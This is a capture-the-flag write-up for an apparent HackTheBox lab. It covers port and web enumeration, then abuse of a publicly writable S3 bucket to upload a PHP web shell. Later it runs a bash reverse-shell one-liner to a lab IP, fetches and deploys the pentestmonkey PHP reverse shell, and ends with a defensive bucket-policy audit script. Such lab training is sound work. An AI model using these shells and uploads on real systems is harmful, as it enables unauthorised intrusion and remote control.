## Information gathering

~~~shell
IP=10.129.251.87
~~~

### Port enumeration

~~~shell
sudo nmap -p- -sSCV --open --min-rate 4000 -n -Pn $IP -oG allPortsS3
~~~

~~~
Starting Nmap 7.80 ( https://nmap.org ) at 2023-07-15 23:25 -05
Nmap scan report for 10.129.251.87
Host is up (0.11s latency).
Not shown: 61766 closed ports, 3767 filtered ports
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.41
|_http-server-header: Apache/2.4.41
|_http-title: Travel to Planet Red
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 36.25 seconds
~~~

* 22/tcp ssh OpenSSH 8.2p1
* 80/tcp http Apache httpd 2.4.41

### Web path enumeration

![](https://hackmd.io/_uploads/By7sOlZ92.png)

#### NSE http-enum

~~~shell
sudo nmap -p 80 --script=http-enum $IP
~~~

~~~
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-16 00:46 EDT
Nmap scan report for 10.129.251.87
Host is up (0.11s latency).

PORT   STATE SERVICE
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 19.38 seconds
~~~

#### wfuzz

~~~shell
wfuzz -w /usr/share/SecLists/Discovery/Web-Content/common.txt -u $IP/FUZZ --hc=404 -t 40
~~~

~~~
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://10.129.251.87/FUZZ
Total requests: 4715

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================

000000023:   403        7 L      20 W       199 Ch      ".hta"
000000025:   403        7 L      20 W       199 Ch      ".htpasswd"
000000024:   403        7 L      20 W       199 Ch      ".htaccess"
000002194:   200        158 L    342 W      4372 Ch     "index.html"
000003712:   403        7 L      20 W       199 Ch      "server-status"

Total time: 17.42445
Processed Requests: 4715
Filtered Requests: 4710
Requests/sec.: 270.5966
~~~

#### whatweb

~~~shell
whatweb http://$IP/
~~~

~~~
http://10.129.251.87 [200 OK] Apache[2.4.41], Country[RESERVED][ZZ], HTML5, HTTPServer[Apache/2.4.41], IP[10.129.251.87], Script, Title[Travel to Planet Red]
~~~

#### nikto

~~~shell
nikto -url http://$IP/
~~~

~~~
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          10.129.251.87
+ Target Hostname:    10.129.251.87
+ Target Port:        80
+ Start Time:         2023-07-16 00:53:59 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.41
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ /: Server may leak inodes via ETags, header found with file /, inode: 1114, size: 60044876bc644, mtime: gzip. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ Apache/2.4.41 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ OPTIONS: Allowed HTTP Methods: GET, POST, OPTIONS, HEAD .
+ 8102 requests: 0 error(s) and 5 item(s) reported on remote host
+ End Time:           2023-07-16 01:11:36 (GMT-4) (1057 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
~~~

#### ZAP

![](https://hackmd.io/_uploads/rJBTslbcn.png)

<http://s3.unveiled.htb/unveiled-backups/main.js>

### s3.unveiled.htb in `/etc/hosts`

~~~shell
...
10.129.251.87 s3.unveiled.htb
...
~~~

![](https://hackmd.io/_uploads/SJDbMb-92.png)

~~~shell
$ sudo apt install awscli
~~~

~~~shell
$ aws configure
AWS Access Key ID [None]: 0xFR
AWS Secret Access Key [None]: 0XFR
Default region name [None]:
Default output format [None]:
~~~

~~~shell
$ aws s3 --endpoint-url http://s3.unveiled.htb ls
2023-07-15 22:38:30 unveiled-backups
2023-07-15 22:38:30 website-assets
~~~

~~~shell
$ aws s3 --endpoint-url http://s3.unveiled.htb ls s3://website-assets

An error occurred (InvalidClientTokenId) when calling the ListObjectsV2 operation: The security token included in the request is invalid
~~~

~~~shell
$ aws s3 --endpoint-url http://s3.unveiled.htb ls s3://unveiled-backups
2023-07-15 22:38:32       4495 index.html
2023-07-15 22:38:32       1107 main.tf
~~~

~~~shell
echo "Test file" > test.txt
~~~

~~~shell
$ aws s3 --endpoint-url http://s3.unveiled.htb cp test.txt s3://unveiled-backups/0xFR.txt
~~~

~~~shell
$ aws s3 --endpoint-url http://s3.unveiled.htb ls s3://unveiled-backups
2023-07-16 01:59:57         10 0xFR.txt
2023-07-15 22:38:32       4495 index.html
2023-07-15 22:38:32       1107 main.tf
~~~

~~~shell
$ aws s3 --endpoint-url http://s3.unveiled.htb cp test.txt s3://website-assets/0xFR.txt
upload: ./test.txt to s3://website-assets/0xFR.txt
~~~

~~~shell
$ curl http://10.129.251.87/0xFR.txt
Test file
~~~

~~~php
<?php system($_REQUEST["cmd"]); ?>
~~~

~~~shell
$ aws s3 --endpoint-url http://s3.unveiled.htb cp cmd.php s3://website-assets/cmd.php
upload: ./cmd.php to s3://website-assets/cmd.php
~~~

~~~shell
$ curl http://10.129.251.87/cmd.php?cmd=ls
Test file
~~~

~~~shell
curl http://10.129.251.87/cmd.php?cmd=bash -c 'bash -i >& /dev/tcp/10.10.14.22/5000 0>&1'
~~~

~~~shell
wget https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php
~~~

~~~php
$ip = '10.10.14.22';  // CHANGE THIS
$port = 5000;         // CHANGE THIS
~~~

~~~shell
$ aws s3 --endpoint-url http://s3.unveiled.htb cp php-reverse-shell.php s3://website-assets/php-reverse-shell.php
upload: ./php-reverse-shell.php to s3://website-assets/php-reverse-shell.php
~~~

~~~shell
$ curl http://10.129.251.87/php-reverse-shell.php
~~~

~~~shell
find / -name flag.txt 2>/dev/null
/var/www/flag.txt
~~~
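The root cause above is a bucket (`website-assets`) that anyone can write to while the web server serves it as its document root. As an added example, not code from the writeup, here is a small bucket-policy audit in Python that reports which write actions a policy grants to anonymous callers; the two policies are constructed for illustration, with the weak setting beside the corrected read-only one.

```python
import json
from fnmatch import fnmatch

# Constructed sample policies (not taken from the target). WEAK_POLICY mirrors
# the misconfiguration in the writeup: anyone may PutObject into the bucket that
# backs the website. FIXED_POLICY keeps the site readable but drops the write.
WEAK_POLICY = json.dumps({"Version": "2012-10-17", "Statement": [{
    "Effect": "Allow", "Principal": "*",
    "Action": ["s3:GetObject", "s3:PutObject"],
    "Resource": "arn:aws:s3:::website-assets/*"}]})
FIXED_POLICY = json.dumps({"Version": "2012-10-17", "Statement": [{
    "Effect": "Allow", "Principal": "*",
    "Action": "s3:GetObject",
    "Resource": "arn:aws:s3:::website-assets/*"}]})

# Actions that let an unauthenticated caller change what the bucket serves.
WRITE_ACTIONS = ("s3:putobject", "s3:putobjectacl", "s3:deleteobject")


def _as_list(value):
    """Policy fields may be a scalar or a list; normalise to a list."""
    return value if isinstance(value, list) else [value]


def _is_anonymous(principal):
    """True for Principal "*" or {"AWS": "*"} (the "*" may be inside a list)."""
    if principal == "*":
        return True
    return isinstance(principal, dict) and "*" in _as_list(principal.get("AWS", []))


def anonymous_actions(policy_json):
    """Lower-cased action patterns granted to everyone by unconditional Allows."""
    granted = set()
    for stmt in _as_list(json.loads(policy_json).get("Statement", [])):
        if (stmt.get("Effect") == "Allow" and not stmt.get("Condition")
                and _is_anonymous(stmt.get("Principal"))):
            granted.update(a.lower() for a in _as_list(stmt.get("Action", [])))
    return granted


def anonymous_writes(policy_json):
    """Write actions an anonymous caller gets; wildcards (s3:*, s3:Put*) count."""
    patterns = anonymous_actions(policy_json)
    return {w for w in WRITE_ACTIONS if any(fnmatch(w, p) for p in patterns)}
```

The check looks only at Allow statements in the bucket policy itself; explicit Deny statements, bucket ACLs and the account's Block Public Access settings are not evaluated here.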